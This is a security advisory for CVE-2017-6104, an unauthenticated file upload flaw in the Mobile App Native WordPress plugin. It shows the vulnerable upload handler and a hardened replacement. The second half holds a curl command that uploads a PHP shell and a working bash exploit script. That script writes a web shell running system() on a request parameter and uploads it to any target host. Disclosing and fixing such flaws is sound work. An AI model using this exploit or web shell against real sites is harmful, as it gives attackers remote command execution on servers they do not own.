./zen-mobile-app-native/server/images.php code for missing authentication
The Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in the file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't validate the uploaded file's type or extension, so executable PHP can be uploaded and is written to a web-accessible directory under the plugin path.

```php
<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

// No authentication, capability or nonce check happens before this point.
if ($_FILES['file']['name']) {
    if (!$_FILES['file']['error']) {
        // Only 101 possible names (md5 of 100..200), so the stored name is guessable.
        $name = md5(rand(100, 200));
        // Extension is copied from the client-supplied filename; '.php' is accepted.
        $ext = explode('.', $_FILES['file']['name']);
        $filename = $name . '.' . $ext[1];
        // Written into the plugin directory, where the web server executes PHP.
        $destination = 'images/' . $filename;
        $location = $_FILES["file"]["tmp_name"];
        move_uploaded_file($location, $destination);
        echo $plugin_url.'/server/images/' . $filename;
    }
    else {
        echo $message = 'Ooops! Your upload triggered the following error: '.$_FILES['file']['error'];
    }
}
```
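A hardened replacement for the handler above, added here as an example and not code from the plugin or its author. It assumes WordPress is already loaded and that the handler is wired as a wp_ajax_* action whose client sends a nonce created with wp_create_nonce('zen_image_upload'); the action and nonce names are assumptions.

```php
<?php
// Hardened upload handler (added example; not the plugin's code).
// Assumes WordPress is loaded, so the caller is identified by the WP auth cookie.
header('Content-Type: application/json; charset=utf-8');
// No 'Access-Control-Allow-Origin: *': a wildcard CORS header is not needed for an authenticated upload.

// 1. Authentication and authorisation: reject anonymous callers and users without upload rights.
if (!is_user_logged_in() || !current_user_can('upload_files')) {
    wp_send_json_error('forbidden', 403);   // wp_send_json_error() exits after sending
}

// 2. CSRF protection: nonce action name 'zen_image_upload' is an assumption for this example.
check_ajax_referer('zen_image_upload', '_wpnonce');   // dies with 403 on failure

if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    wp_send_json_error('upload error', 400);
}

// 3. Content validation: accept only image types, decided by extension AND sniffed content,
//    never by the client-supplied filename alone (the original trusted explode('.')[1]).
$allowed = [
    'jpg|jpeg' => 'image/jpeg',
    'png'      => 'image/png',
    'gif'      => 'image/gif',
];
$check = wp_check_filetype_and_ext($_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed);
if (empty($check['ext']) || empty($check['type'])) {
    wp_send_json_error('only image files are accepted', 415);
}

// 4. Server-chosen, unpredictable name; extension comes from the validated type.
//    (The original used md5(rand(100, 200)): 101 guessable names.)
$filename = bin2hex(random_bytes(16)) . '.' . $check['ext'];

// 5. Store through the WordPress upload pipeline into wp-content/uploads, not the plugin
//    directory; PHP execution should also be disabled for the uploads directory at the web server.
$overrides = [
    'test_form'                => false,
    'mimes'                    => $allowed,
    'unique_filename_callback' => function ($dir, $name, $ext) use ($filename) {
        return $filename;
    },
];
$result = wp_handle_upload($_FILES['file'], $overrides);
if (isset($result['error'])) {
    wp_send_json_error($result['error'], 500);
}
wp_send_json_success(['url' => $result['url']]);
```

Every check fails closed before any file is written, so a request that lacks a session, a capability, a valid nonce or a genuine image never reaches move_uploaded_file().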
CVE ID: CVE-2017-6104

Trojan:

$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

```bash
#!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0
cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST['cmd'])){
echo "<pre>";
\$cmd = (\$_REQUEST['cmd']);
system(\$cmd);
echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-
red='\033[0;31m'
NC='\033[0m' # No Color
while [ true ]; do
echo -e ${red};
echo -e " Mobile App Native 3.0 File Upload PoC Redux $NC";
echo " 3/1/2017";
echo " Larry W. Cashdollar, @_larry0";
echo
echo " CVE-2017-6104";
echo "- Advisory -";
echo "http://www.vapid.dhs.org/advisory.php?v=178";
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo "[+] Hostname $target";
echo "[+] Exploiting Plugin";
echo
RESULT=`curl -# -F '[email protected]' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
echo "[==========================================================================]"
echo $RESULT
echo "[==========================================================================]"
done
```